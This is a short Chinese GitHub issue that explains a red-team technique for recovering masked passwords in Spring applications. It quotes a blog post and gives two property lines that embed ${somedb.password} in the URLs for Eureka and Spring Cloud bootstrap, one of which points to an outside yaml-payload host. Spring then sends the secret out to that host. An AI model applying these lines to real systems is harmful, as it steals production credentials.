获取被星号脱敏的密码的明文 (方法二) 原理/出处


[2020攻防演练弹药库-您有主机上线请注意 ](https://blog.riskivy.com/2020%e6%94%bb%e9%98%b2%e6%bc%94%e7%bb%83%e5%bc%b9%e8%8d%af%e5%ba%93-%e6%82%a8%e6%9c%89%e4%b8%bb%e6%9c%ba%e4%b8%8a%e7%ba%bf%e8%af%b7%e6%b3%a8%e6%84%8f/#Spring)

> 就算实在不能RCE, 这里也有个技巧可以偷取 Spring 配置文件中的加密字段, 偷一下生产环境的密码/key也ok

```
eureka.client.serviceUrl.defaultZone=http://${somedb.password}@127.0.0.1:5000
spring.cloud.bootstrap.location=http://${somedb.password}@artsploit.com/yaml-payload.yml
```

`${somedb.password} ` 是Spring的占位符, 当发起如下请求时会主动填充, 也就是说所有用以下请求格式的都可以外带, 不限于`eureka`

`scheme://[user:password@]domain:port/path?query_string#fragment_id`

[【Spring源码分析】.properties文件读取及占位符${...}替换源码解析 - 五月的仓颉 - 博客园](https://www.cnblogs.com/xrq730/p/6785473.html)

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

获取被星号脱敏的密码的明文 (方法二) 原理/出处 #1

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

获取被星号脱敏的密码的明文 (方法二) 原理/出处 #1

Description

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions